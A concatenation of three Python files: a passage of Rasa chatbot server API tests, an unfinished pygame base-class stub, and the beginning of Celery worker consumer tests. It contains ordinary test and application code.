"event": "user",
"text": "hello",
"parse_data": {
"entities": {},
"intent": {"confidence": 0.57, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
},
]
_, response = await rasa_app.post(
"/model/predict",
json=data,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.status == HTTPStatus.BAD_REQUEST
async def test_predict_empty_request_body(rasa_app: SanicASGITestClient):
_, response = await rasa_app.post(
"/model/predict", headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.status == HTTPStatus.BAD_REQUEST
async def test_append_events_empty_request_body(rasa_app: SanicASGITestClient,):
_, response = await rasa_app.post(
"/conversations/testid/tracker/events",
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.status == HTTPStatus.BAD_REQUEST
async def test_replace_events_empty_request_body(rasa_app: SanicASGITestClient):
_, response = await rasa_app.put(
"/conversations/testid/tracker/events",
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.status == HTTPStatus.BAD_REQUEST
@freeze_time("2018-01-01")
async def test_requesting_non_existent_tracker(rasa_app: SanicASGITestClient):
model_id = rasa_app.sanic_app.agent.model_id
_, response = await rasa_app.get("/conversations/madeupid/tracker")
content = response.json
assert response.status == HTTPStatus.OK
assert content["paused"] is False
assert content["slots"] == {
"name": None,
REQUESTED_SLOT: None,
SESSION_START_METADATA_SLOT: None,
}
assert content["sender_id"] == "madeupid"
assert content["events"] == [
{
"event": "action",
"name": "action_session_start",
"policy": None,
"confidence": 1,
"timestamp": 1514764800,
"action_text": None,
"hide_rule_turn": False,
"metadata": {"model_id": model_id},
},
{
"event": "session_started",
"timestamp": 1514764800,
"metadata": {"model_id": model_id},
},
{
"event": "action",
INTENT_NAME_KEY: "action_listen",
"policy": None,
"confidence": None,
"timestamp": 1514764800,
"action_text": None,
"hide_rule_turn": False,
"metadata": {"model_id": model_id},
},
]
assert content["latest_message"] == {
"text": None,
"intent": {},
"entities": [],
"message_id": None,
"metadata": {},
}
@pytest.mark.parametrize("event", test_events)
async def test_pushing_event(rasa_app: SanicASGITestClient, event: Event):
model_id = rasa_app.sanic_app.agent.model_id
sender_id = str(uuid.uuid1())
conversation = f"/conversations/{sender_id}"
serialized_event = event.as_dict()
# Remove timestamp so that a new one is assigned on the server
serialized_event.pop("timestamp")
time_before_adding_events = time.time()
# Wait a bit so that the server-generated timestamp is strictly greater
# than time_before_adding_events
time.sleep(0.01)
_, response = await rasa_app.post(
f"{conversation}/tracker/events",
json=serialized_event,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.json is not None
assert response.status == HTTPStatus.OK
_, tracker_response = await rasa_app.get(f"/conversations/{sender_id}/tracker")
tracker = tracker_response.json
assert tracker is not None
assert len(tracker.get("events")) == 4
deserialized_events = [Event.from_parameters(event) for event in tracker["events"]]
# there is an initial session start sequence at the beginning of the tracker
assert deserialized_events[:3] == with_model_ids(session_start_sequence, model_id)
assert deserialized_events[3] == with_model_id(event, model_id)
assert deserialized_events[3].timestamp > time_before_adding_events
async def test_pushing_event_with_existing_model_id(rasa_app: SanicASGITestClient):
model_id = rasa_app.sanic_app.agent.model_id
sender_id = str(uuid.uuid1())
conversation = f"/conversations/{sender_id}"
existing_model_id = "some_old_id"
assert existing_model_id != model_id
event = with_model_id(BotUttered("hello!"), existing_model_id)
serialized_event = event.as_dict()
# Wait a bit so that the server-generated timestamp is strictly greater
# than time_before_adding_events
_, response = await rasa_app.post(
f"{conversation}/tracker/events",
json=serialized_event,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
_, tracker_response = await rasa_app.get(f"/conversations/{sender_id}/tracker")
tracker = tracker_response.json
deserialized_events = [Event.from_parameters(event) for event in tracker["events"]]
# there is an initial session start sequence at the beginning of the tracker
received_event = deserialized_events[3]
assert received_event == with_model_id(event, existing_model_id)
async def test_push_multiple_events(rasa_app: SanicASGITestClient):
model_id = rasa_app.sanic_app.agent.model_id
conversation_id = str(uuid.uuid1())
conversation = f"/conversations/{conversation_id}"
events = [e.as_dict() for e in test_events]
_, response = await rasa_app.post(
f"{conversation}/tracker/events",
json=events,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.json is not None
assert response.status == HTTPStatus.OK
_, tracker_response = await rasa_app.get(
f"/conversations/{conversation_id}/tracker"
)
tracker = tracker_response.json
assert tracker is not None
# there is an initial session start sequence at the beginning
assert [
Event.from_parameters(event) for event in tracker.get("events")
] == with_model_ids(session_start_sequence + test_events, model_id)
@pytest.mark.parametrize(
"params", ["?execute_side_effects=true&output_channel=callback", ""]
)
async def test_pushing_event_while_executing_side_effects(
rasa_server: Sanic, params: Text
):
input_channel = CallbackInput(EndpointConfig("https://example.com/callback"))
channel.register([input_channel], rasa_server, "/webhooks/")
rasa_app = rasa_server.asgi_client
sender_id = str(uuid.uuid1())
conversation = f"/conversations/{sender_id}"
serialized_event = test_events[1].as_dict()
with aioresponses() as mocked:
mocked.post(
"https://example.com/callback",
repeat=True,
headers={"Content-Type": "application/json"},
)
await rasa_app.post(
f"{conversation}/tracker/events{params}",
json=serialized_event,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
r = latest_request(mocked, "post", "https://example.com/callback")
if not params:
assert r is None
else:
message_received = json_of_latest_request(r)
assert message_received.get("recipient_id") == sender_id
assert message_received.get("text") == serialized_event.get("text")
async def test_post_conversation_id_with_slash(rasa_app: SanicASGITestClient):
model_id = rasa_app.sanic_app.agent.model_id
conversation_id = str(uuid.uuid1())
id_len = len(conversation_id) // 2
conversation_id = conversation_id[:id_len] + "/+-_\\=" + conversation_id[id_len:]
conversation = f"/conversations/{conversation_id}"
events = [e.as_dict() for e in test_events]
_, response = await rasa_app.post(
f"{conversation}/tracker/events",
json=events,
headers={"Content-Type": "application/json"},
)
assert response.json is not None
assert response.status == HTTPStatus.OK
_, tracker_response = await rasa_app.get(
f"/conversations/{conversation_id}/tracker"
)
tracker = tracker_response.json
assert tracker is not None
# there is a session start sequence at the start
assert [
Event.from_parameters(event) for event in tracker.get("events")
] == with_model_ids(session_start_sequence + test_events, model_id)
async def test_put_tracker(rasa_app: SanicASGITestClient):
data = [event.as_dict() for event in test_events]
_, response = await rasa_app.put(
"/conversations/pushtracker/tracker/events",
json=data,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
content = response.json
assert response.status == HTTPStatus.OK
assert len(content["events"]) == len(test_events)
assert content["sender_id"] == "pushtracker"
_, tracker_response = await rasa_app.get("/conversations/pushtracker/tracker")
tracker = tracker_response.json
assert tracker is not None
evts = tracker.get("events")
assert events.deserialise_events(evts) == test_events
async def test_predict_without_conversation_id(rasa_app: SanicASGITestClient):
_, response = await rasa_app.post("/conversations/non_existent_id/predict")
assert response.status == HTTPStatus.NOT_FOUND
assert response.json["message"] == "Conversation ID not found."
async def test_sorted_predict(rasa_app: SanicASGITestClient):
await _create_tracker_for_sender(rasa_app, "sortedpredict")
_, response = await rasa_app.post("/conversations/sortedpredict/predict")
scores = response.json["scores"]
sorted_scores = sorted(scores, key=lambda k: (-k["score"], k["action"]))
assert scores == sorted_scores
async def _create_tracker_for_sender(app: SanicASGITestClient, sender_id: Text) -> None:
data = [event.as_dict() for event in test_events[:3]]
_, response = await app.put(
f"/conversations/{sender_id}/tracker/events",
json=data,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
async def test_get_tracker_with_jwt(rasa_secured_app: SanicASGITestClient):
# token generated with secret "core" and algorithm HS256
# on https://jwt.io/
# {"user": {"username": "testadmin", "role": "admin"}}
jwt_header = {
"Authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
"eyJ1c2VyIjp7InVzZXJuYW1lIjoidGVzdGFkbWluIiwic"
"m9sZSI6ImFkbWluIn19.NAQr0kbtSrY7d28XTqRzawq2u"
"QRre7IWTuIDrCn5AIw"
}
_, response = await rasa_secured_app.get(
"/conversations/testadmin/tracker", headers=jwt_header
)
assert response.status == HTTPStatus.OK
_, response = await rasa_secured_app.get(
"/conversations/testuser/tracker", headers=jwt_header
)
assert response.status == HTTPStatus.OK
# {"user": {"username": "testuser", "role": "user"}}
jwt_header = {
"Authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
"eyJ1c2VyIjp7InVzZXJuYW1lIjoidGVzdHVzZXIiLCJyb"
"2xlIjoidXNlciJ9fQ.JnMTLYd56qut2w9h7hRQlDm1n3l"
"HJHOxxC_w7TtwCrs"
}
_, response = await rasa_secured_app.get(
"/conversations/testadmin/tracker", headers=jwt_header
)
assert response.status == HTTPStatus.FORBIDDEN
_, response = await rasa_secured_app.get(
"/conversations/testuser/tracker", headers=jwt_header
)
assert response.status == HTTPStatus.OK
def test_list_routes(empty_agent: Agent):
app = rasa.server.create_app(empty_agent, auth_token=None)
routes = utils.list_routes(app)
assert set(routes.keys()) == {
"hello",
"version",
"status",
"retrieve_tracker",
"append_events",
"replace_events",
"retrieve_story",
"execute_action",
"trigger_intent",
"predict",
"add_message",
"train",
"evaluate_stories",
"evaluate_intents",
"tracker_predict",
"parse",
"load_model",
"unload_model",
"get_domain",
}
async def test_unload_model_error(rasa_app: SanicASGITestClient):
_, response = await rasa_app.get("/status")
assert response.status == HTTPStatus.OK
assert "model_file" in response.json and response.json["model_file"] is not None
_, response = await rasa_app.delete("/model")
assert response.status == HTTPStatus.NO_CONTENT
async def test_get_domain(rasa_app: SanicASGITestClient):
_, response = await rasa_app.get(
"/domain", headers={"accept": rasa.server.JSON_CONTENT_TYPE}
)
content = response.json
assert response.status == HTTPStatus.OK
assert "config" in content
assert "intents" in content
assert "entities" in content
assert "slots" in content
assert "responses" in content
assert "actions" in content
async def test_get_domain_invalid_accept_header(rasa_app: SanicASGITestClient):
_, response = await rasa_app.get("/domain")
assert response.status == HTTPStatus.NOT_ACCEPTABLE
async def test_load_model(rasa_app: SanicASGITestClient, trained_core_model: Text):
_, response = await rasa_app.get("/status")
assert response.status == HTTPStatus.OK
assert "fingerprint" in response.json
old_fingerprint = response.json["fingerprint"]
data = {"model_file": trained_core_model}
_, response = await rasa_app.put("/model", json=data)
assert response.status == HTTPStatus.NO_CONTENT
_, response = await rasa_app.get("/status")
assert response.status == HTTPStatus.OK
assert "fingerprint" in response.json
assert old_fingerprint != response.json["fingerprint"]
async def test_load_model_from_model_server(
rasa_app: SanicASGITestClient, trained_core_model: Text, tear_down_scheduler: None
):
_, response = await rasa_app.get("/status")
assert response.status == HTTPStatus.OK
assert "fingerprint" in response.json
old_fingerprint = response.json["fingerprint"]
endpoint = EndpointConfig("https://example.com/model/trained_core_model")
with open(trained_core_model, "rb") as f:
with aioresponses(passthrough=["http://127.0.0.1"]) as mocked:
headers = {}
fs = os.fstat(f.fileno())
headers["Content-Length"] = str(fs[6])
mocked.get(
"https://example.com/model/trained_core_model",
content_type="application/x-tar",
headers={
"filename": "some_model_name.tar.gz",
"ETag": "new_fingerprint",
},
body=f.read(),
)
data = {"model_server": {"url": endpoint.url}}
_, response = await rasa_app.put("/model", json=data)
assert response.status == HTTPStatus.NO_CONTENT
_, response = await rasa_app.get("/status")
assert response.status == HTTPStatus.OK
assert "fingerprint" in response.json
assert old_fingerprint != response.json["fingerprint"]
async def test_load_model_invalid_request_body(
rasa_non_trained_app: SanicASGITestClient,
):
_, response = await rasa_non_trained_app.put("/model")
assert response.status == HTTPStatus.BAD_REQUEST
async def test_load_model_invalid_configuration(
rasa_non_trained_app: SanicASGITestClient,
):
data = {"model_file": "some-random-path"}
_, response = await rasa_non_trained_app.put("/model", json=data)
assert response.status == HTTPStatus.BAD_REQUEST
async def test_execute(rasa_app: SanicASGITestClient):
await _create_tracker_for_sender(rasa_app, "test_execute")
data = {INTENT_NAME_KEY: "utter_greet"}
_, response = await rasa_app.post("/conversations/test_execute/execute", json=data)
assert response.status == HTTPStatus.OK
parsed_content = response.json
assert parsed_content["tracker"]
assert parsed_content["messages"]
async def test_execute_without_conversation_id(rasa_app: SanicASGITestClient):
data = {INTENT_NAME_KEY: "utter_greet"}
_, response = await rasa_app.post(
"/conversations/non_existent_id/execute", json=data
)
assert response.status == HTTPStatus.NOT_FOUND
assert response.json["message"] == "Conversation ID not found."
async def test_execute_with_missing_action_name(rasa_app: SanicASGITestClient):
test_sender = "test_execute_with_missing_action_name"
await _create_tracker_for_sender(rasa_app, test_sender)
data = {"wrong-key": "utter_greet"}
_, response = await rasa_app.post(
f"/conversations/{test_sender}/execute", json=data
)
assert response.status == HTTPStatus.BAD_REQUEST
async def test_execute_with_not_existing_action(rasa_app: SanicASGITestClient):
test_sender = "test_execute_with_not_existing_action"
await _create_tracker_for_sender(rasa_app, test_sender)
data = {"name": "ka[pa[opi[opj[oj[oija"}
_, response = await rasa_app.post(
f"/conversations/{test_sender}/execute", json=data
)
assert response.status == HTTPStatus.INTERNAL_SERVER_ERROR
async def test_trigger_intent(rasa_app: SanicASGITestClient):
data = {INTENT_NAME_KEY: "greet"}
_, response = await rasa_app.post(
"/conversations/test_trigger/trigger_intent", json=data
)
assert response.status == HTTPStatus.OK
parsed_content = response.json
assert parsed_content["tracker"]
assert parsed_content["messages"]
async def test_trigger_intent_with_entity(rasa_app: SanicASGITestClient):
entity_name = "name"
entity_value = "Sara"
data = {INTENT_NAME_KEY: "greet", "entities": {entity_name: entity_value}}
_, response = await rasa_app.post(
"/conversations/test_trigger/trigger_intent", json=data
)
assert response.status == HTTPStatus.OK
parsed_content = response.json
last_slot_set_event = [
event
for event in parsed_content["tracker"]["events"]
if event["event"] == "slot"
][-1]
assert parsed_content["tracker"]
assert parsed_content["messages"]
assert last_slot_set_event["name"] == entity_name
assert last_slot_set_event["value"] == entity_value
async def test_trigger_intent_with_missing_intent_name(rasa_app: SanicASGITestClient):
test_sender = "test_trigger_intent_with_missing_action_name"
data = {"wrong-key": "greet"}
_, response = await rasa_app.post(
f"/conversations/{test_sender}/trigger_intent", json=data
)
assert response.status == HTTPStatus.BAD_REQUEST
async def test_trigger_intent_with_not_existing_intent(rasa_app: SanicASGITestClient):
test_sender = "test_trigger_intent_with_not_existing_intent"
await _create_tracker_for_sender(rasa_app, test_sender)
data = {INTENT_NAME_KEY: "ka[pa[opi[opj[oj[oija"}
_, response = await rasa_app.post(
f"/conversations/{test_sender}/trigger_intent", json=data
)
assert response.status == HTTPStatus.NOT_FOUND
@pytest.mark.parametrize(
"input_channels, output_channel_to_use, expected_channel",
[
(None, "slack", CollectingOutputChannel),
([], None, CollectingOutputChannel),
([RestInput()], "slack", CollectingOutputChannel),
([RestInput()], "rest", CollectingOutputChannel),
(
[RestInput(), SlackInput("test", slack_signing_secret="foobar")],
"slack",
SlackBot,
),
],
)
def test_get_output_channel(
input_channels: List[Text], output_channel_to_use: Text, expected_channel: Type
):
request = MagicMock()
app = MagicMock()
app.input_channels = input_channels
request.app = app
request.args = {"output_channel": output_channel_to_use}
actual = rasa.server._get_output_channel(request, None)
assert isinstance(actual, expected_channel)
@pytest.mark.parametrize(
"input_channels, expected_channel",
[
([], CollectingOutputChannel),
([RestInput()], CollectingOutputChannel),
([RestInput(), SlackInput("test", slack_signing_secret="foobar")], SlackBot),
],
)
def test_get_latest_output_channel(input_channels: List[Text], expected_channel: Type):
request = MagicMock()
app = MagicMock()
app.input_channels = input_channels
request.app = app
request.args = {"output_channel": "latest"}
tracker = DialogueStateTracker.from_events(
"default", [UserUttered("text", input_channel="slack")]
)
actual = rasa.server._get_output_channel(request, tracker)
assert isinstance(actual, expected_channel)
def test_app_when_app_has_no_input_channels():
request = MagicMock()
class NoInputChannels:
pass
request.app = NoInputChannels()
actual = rasa.server._get_output_channel(
request, DialogueStateTracker.from_events("default", [])
)
assert isinstance(actual, CollectingOutputChannel)
@pytest.mark.parametrize(
"conversation_events,until_time,fetch_all_sessions,expected",
# conversation with one session
[
(
[
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("hi", {"name": "greet"}),
ActionExecuted("utter_greet"),
],
None,
True,
"""version: "2.0"
stories:
- story: some-conversation-ID
steps:
- intent: greet
user: |-
hi
- action: utter_greet""",
),
# conversation with multiple sessions
(
[
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("hi", {"name": "greet"}),
ActionExecuted("utter_greet"),
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("bye bye", {"name": "goodbye"}),
ActionExecuted("utter_goodbye"),
],
None,
True,
"""version: "2.0"
stories:
- story: some-conversation-ID, story 1
steps:
- intent: greet
user: |-
hi
- action: utter_greet
- story: some-conversation-ID, story 2
steps:
- intent: goodbye
user: |-
bye bye
- action: utter_goodbye""",
),
# conversation with multiple sessions, but setting `all_sessions=false`
# means only the last one is returned
(
[
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("hi", {"name": "greet"}),
ActionExecuted("utter_greet"),
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("bye bye", {"name": "goodbye"}),
ActionExecuted("utter_goodbye"),
],
None,
False,
"""version: "2.0"
stories:
- story: some-conversation-ID
steps:
- intent: goodbye
user: |-
bye bye
- action: utter_goodbye""",
),
# the default for `all_sessions` is `false` - this test checks that
# only the latest session is returned in that case
(
[
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("hi", {"name": "greet"}),
ActionExecuted("utter_greet"),
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("bye bye", {"name": "goodbye"}),
ActionExecuted("utter_goodbye"),
],
None,
None,
"""version: "2.0"
stories:
- story: some-conversation-ID
steps:
- intent: goodbye
user: |-
bye bye
- action: utter_goodbye""",
),
# `until` parameter means only the first session is returned
(
[
ActionExecuted(ACTION_SESSION_START_NAME, timestamp=1),
SessionStarted(timestamp=2),
UserUttered("hi", {"name": "greet"}, timestamp=3),
ActionExecuted("utter_greet", timestamp=4),
ActionExecuted(ACTION_SESSION_START_NAME, timestamp=5),
SessionStarted(timestamp=6),
UserUttered("bye bye", {"name": "goodbye"}, timestamp=7),
ActionExecuted("utter_goodbye", timestamp=8),
],
4,
True,
"""version: "2.0"
stories:
- story: some-conversation-ID
steps:
- intent: greet
user: |-
hi
- action: utter_greet""",
),
# empty conversation
([], None, True, 'version: "2.0"'),
# Conversation with slot
(
[
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("hi", {"name": "greet"}),
ActionExecuted("utter_greet"),
SlotSet(REQUESTED_SLOT, "some value"),
],
None,
True,
"""version: "2.0"
stories:
- story: some-conversation-ID
steps:
- intent: greet
user: |-
hi
- action: utter_greet
- slot_was_set:
- requested_slot: some value""",
),
],
)
async def test_get_story(
rasa_app: SanicASGITestClient,
monkeypatch: MonkeyPatch,
conversation_events: List[Event],
until_time: Optional[float],
fetch_all_sessions: Optional[bool],
expected: Text,
):
conversation_id = "some-conversation-ID"
tracker_store = InMemoryTrackerStore(Domain.empty())
tracker = DialogueStateTracker.from_events(conversation_id, conversation_events)
tracker_store.save(tracker)
monkeypatch.setattr(rasa_app.sanic_app.agent, "tracker_store", tracker_store)
monkeypatch.setattr(
rasa_app.sanic_app.agent.processor, "tracker_store", tracker_store
)
url = f"/conversations/{conversation_id}/story?"
query = {}
if fetch_all_sessions is not None:
query["all_sessions"] = fetch_all_sessions
if until_time is not None:
query["until"] = until_time
_, response = await rasa_app.get(url + urllib.parse.urlencode(query))
assert response.status == HTTPStatus.OK
assert response.content.decode().strip() == expected
async def test_get_story_without_conversation_id(
rasa_app: SanicASGITestClient, monkeypatch: MonkeyPatch
):
conversation_id = "some-conversation-ID"
url = f"/conversations/{conversation_id}/story"
_, response = await rasa_app.get(url)
assert response.status == HTTPStatus.NOT_FOUND
assert response.json["message"] == "Conversation ID not found."
async def test_get_story_does_not_update_conversation_session(
rasa_app: SanicASGITestClient, monkeypatch: MonkeyPatch
):
conversation_id = "some-conversation-ID"
# domain with short session expiration time of one second
domain = Domain.empty()
domain.session_config = SessionConfig(
session_expiration_time=1 / 60, carry_over_slots=True
)
monkeypatch.setattr(rasa_app.sanic_app.agent.processor, "domain", domain)
# conversation contains one session that has expired
now = time.time()
conversation_events = [
ActionExecuted(ACTION_SESSION_START_NAME, timestamp=now - 10),
SessionStarted(timestamp=now - 9),
UserUttered("hi", {"name": "greet"}, timestamp=now - 8),
ActionExecuted("utter_greet", timestamp=now - 7),
]
tracker = DialogueStateTracker.from_events(conversation_id, conversation_events)
# the conversation session has expired
assert rasa_app.sanic_app.agent.processor._has_session_expired(tracker)
tracker_store = InMemoryTrackerStore(domain)
tracker_store.save(tracker)
monkeypatch.setattr(rasa_app.sanic_app.agent, "tracker_store", tracker_store)
monkeypatch.setattr(
rasa_app.sanic_app.agent.processor, "tracker_store", tracker_store
)
_, response = await rasa_app.get(f"/conversations/{conversation_id}/story")
assert response.status == HTTPStatus.OK
# expected story is returned
assert (
response.content.decode().strip()
== """version: "2.0"
stories:
- story: some-conversation-ID
steps:
- intent: greet
user: |-
hi
- action: utter_greet"""
)
# the tracker has the same number of events as were initially added
assert len(tracker.events) == len(conversation_events)
# the last event is still the same as before
assert tracker.events[-1].timestamp == conversation_events[-1].timestamp
@pytest.mark.parametrize(
"initial_tracker_events,events_to_append,expected_events",
[
(
# the tracker is initially empty, and no events are appended
# so we'll just expect the session start sequence with an `action_listen`
[],
[],
[
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
ActionExecuted(ACTION_LISTEN_NAME),
],
),
(
# the tracker is initially empty, and a user utterance is appended
# we expect a tracker with a session start sequence and a user utterance
[],
[UserUttered("/greet", {"name": "greet", "confidence": 1.0})],
[
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
ActionExecuted(ACTION_LISTEN_NAME),
UserUttered("/greet", {"name": "greet", "confidence": 1.0}),
],
),
(
# the tracker is initially empty, and a session start sequence is appended
# we'll just expect the session start sequence
[],
[ActionExecuted(ACTION_SESSION_START_NAME), SessionStarted()],
[ActionExecuted(ACTION_SESSION_START_NAME), SessionStarted()],
),
(
# the tracker already contains some events - we can simply append events
[
ActionExecuted(ACTION_LISTEN_NAME),
UserUttered("/greet", {"name": "greet", "confidence": 1.0}),
],
[ActionExecuted("utter_greet")],
[
ActionExecuted(ACTION_LISTEN_NAME),
UserUttered("/greet", {"name": "greet", "confidence": 1.0}),
ActionExecuted("utter_greet"),
],
),
],
)
async def test_update_conversation_with_events(
rasa_app: SanicASGITestClient,
monkeypatch: MonkeyPatch,
initial_tracker_events: List[Event],
events_to_append: List[Event],
expected_events: List[Event],
):
conversation_id = "some-conversation-ID"
agent = rasa_app.sanic_app.agent
tracker_store = agent.tracker_store
domain = agent.domain
model_id = agent.model_id
if initial_tracker_events:
tracker = agent.processor.get_tracker(conversation_id)
tracker.update_with_events(initial_tracker_events, domain)
tracker_store.save(tracker)
fetched_tracker = await rasa.server.update_conversation_with_events(
conversation_id, agent.processor, domain, events_to_append
)
assert list(fetched_tracker.events) == with_model_ids(expected_events, model_id)
|
unnamed.py
|
"""
this class is the base class
for all things like enemies, and characters.
"""
import pygame as pg
import threading
class IDontKnowWhatToCallItYet:
def start_thread(self, **kwargs):
self.mainthread = threading.Thread(
target=self.mainloop, daemon=True, **kwargs)
self.mainthread.start()
def mainloop(self):
pass
# this needs to be figured out yet.
# i figure i can do that when i get more
# of the workings figured out
def kill_thread(self):
self.
|
__init__.py
|
from __future__ import absolute_import
from __future__ import with_statement
import socket
import sys
from collections import deque
from datetime import datetime, timedelta
from Queue import Empty
from kombu.transport.base import Message
from kombu.connection import BrokerConnection
from mock import Mock, patch
from nose import SkipTest
from celery import current_app
from celery.app.defaults import DEFAULTS
from celery.concurrency.base import BasePool
from celery.datastructures import AttributeDict
from celery.exceptions import SystemTerminate
from celery.task import task as task_dec
from celery.task import periodic_task as periodic_task_dec
from celery.utils import uuid
from celery.worker import WorkController
from celery.worker.buckets import FastQueue
from celery.worker.job import Request
from celery.worker.consumer import Consumer as MainConsumer
from celery.worker.consumer import QoS, RUN, PREFETCH_COUNT_MAX, CLOSE
from celery.utils.serialization import pickle
from celery.utils.timer2 import Timer
from celery.tests.utils import AppCase, Case
class PlaceHolder(object):
pass
class MyKombuConsumer(MainConsumer):
broadcast_consumer = Mock()
task_consumer = Mock()
def __init__(self, *args, **kwargs):
kwargs.setdefault("pool", BasePool(2))
super(MyKombuConsumer, self).__init__(*args, **kwargs)
def restart_heartbeat(self):
self.heart = None
class MockNode(object):
commands = []
def handle_message(self, body, message):
self.commands.append(body.pop("command", None))
class MockEventDispatcher(object):
sent = []
closed = False
flushed = False
_outbound_buffer = []
def send(self, event, *args, **kwargs):
self.sent.append(event)
def close(self):
self.closed = True
def flush(self):
self.flushed = True
class MockHeart(object):
closed = False
def stop(self):
self.closed = True
@task_dec()
def foo_task(x, y, z, **kwargs):
return x * y * z
@periodic_task_dec(run_every=60)
def foo_periodic_task():
return "foo"
def create_message(channel, **data):
data.setdefault("id", uuid())
channel.no_ack_consumers = set()
return Message(channel, body=pickle.dumps(dict(**data)),
content_type="application/x-python-serialize",
content_encoding="binary",
delivery_info={"consumer_tag": "mock"})
class test_QoS(Case):
class _QoS(QoS):
def __init__(self, value):
self.value = value
QoS.__init__(self, None, value, None)
def set(self, value):
return value
def test_qos_increment_decrement(self):
qos = self._QoS(10)
self.assertEqual(qos.increment(), 11)
self.assertEqual(qos.increment(3), 14)
self.assertEqual(qos.increment(-30), 14)
self.assertEqual(qos.decrement(7), 7)
self.assertEqual(qos.decrement(), 6)
with self.assertRaises(AssertionError):
qos.decrement(10)
def test_qos_disabled_increment_decrement(self):
qos = self._QoS(0)
self.assertEqual(qos.increment(), 0)
self.assertEqual(qos.increment(3), 0)
self.assertEqual(qos.increment(-30), 0)
self.assertEqual(qos.decrement(7), 0)
self.assertEqual(qos.decrement(), 0)
self.assertEqual(qos.decrement(10), 0)
def test_qos_thread_safe(self):
qos = self._QoS(10)
def add():
for i in xrange(1000):
qos.increment()
def sub():
for i in xrange(1000):
qos.decrement_eventually()
def threaded(funs):
from threading import Thread
threads = [Thread(target=fun) for fun in funs]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
threaded([add, add])
self.assertEqual(qos.value, 2010)
qos.value = 1000
threaded([add, sub]) # n = 2
self.assertEqual(qos.value, 1000)
def test_exceeds_short(self):
qos = QoS(Mock(), PREFETCH_COUNT_MAX - 1,
current_app.log.get_default_logger())
qos.update()
self.assertEqual(qos.value, PREFETCH_COUNT_MAX - 1)
qos.increment()
self.assertEqual(qos.value, PREFETCH_COUNT_MAX)
qos.increment()
self.assertEqual(qos.value, PREFETCH_COUNT_MAX + 1)
qos.decrement()
self.assertEqual(qos.value, PREFETCH_COUNT_MAX)
qos.decrement()
self.assertEqual(qos.value, PREFETCH_COUNT_MAX - 1)
def test_consumer_increment_decrement(self):
consumer = Mock()
qos = QoS(consumer, 10, current_app.log.get_default_logger())
qos.update()
self.assertEqual(qos.value, 10)
self.assertIn({"prefetch_count": 10}, consumer.qos.call_args)
qos.decrement()
self.assertEqual(qos.value, 9)
self.assertIn({"prefetch_count": 9}, consumer.qos.call_args)
qos.decrement_eventually()
self.assertEqual(qos.value, 8)
self.assertIn({"prefetch_count": 9}, consumer.qos.call_args)
# Does not decrement 0 value
qos.value = 0
qos.decrement()
self.assertEqual(qos.value, 0)
qos.increment()
self.assertEqual(qos.value, 0)
def test_consumer_decrement_eventually(self):
consumer = Mock()
qos = QoS(consumer, 10, current_app.log.get_default_logger())
qos.decrement_eventually()
self.assertEqual(qos.value, 9)
qos.value = 0
qos.decrement_eventually()
self.assertEqual(qos.value, 0)
def test_set(self):
consumer = Mock()
qos = QoS(consumer, 10, current_app.log.get_default_logger())
qos.set(12)
self.assertEqual(qos.prev, 12)
qos.set(qos.prev)
class test_Consumer(Case):
def setUp(self):
self.ready_queue = FastQueue()
self.eta_schedule = Timer()
self.logger = current_app.log.get_default_logger()
self.logger.setLevel(0)
def tearDown(self):
self.eta_schedule.stop()
def test_info(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.qos = QoS(l.task_consumer, 10, l.logger)
info = l.info
self.assertEqual(info["prefetch_count"], 10)
self.assertFalse(info["broker"])
l.connection = current_app.broker_connection()
info = l.info
self.assertTrue(info["broker"])
def test_start_when_closed(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l._state = CLOSE
l.start()
def test_connection(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.reset_connection()
self.assertIsInstance(l.connection, BrokerConnection)
l._state = RUN
l.event_dispatcher = None
l.stop_consumers(close_connection=False)
self.assertTrue(l.connection)
l._state = RUN
l.stop_consumers()
self.assertIsNone(l.connection)
self.assertIsNone(l.task_consumer)
l.reset_connection()
self.assertIsInstance(l.connection, BrokerConnection)
l.stop_consumers()
l.stop()
l.close_connection()
self.assertIsNone(l.connection)
self.assertIsNone(l.task_consumer)
def test_close_connection(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l._state = RUN
l.close_connection()
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
eventer = l.event_dispatcher = Mock()
eventer.enabled = True
heart = l.heart = MockHeart()
l._state = RUN
l.stop_consumers()
self.assertTrue(eventer.close.call_count)
self.assertTrue(heart.closed)
def test_receive_message_unknown(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
backend = Mock()
m = create_message(backend, unknown={"baz": "!!!"})
l.event_dispatcher = Mock()
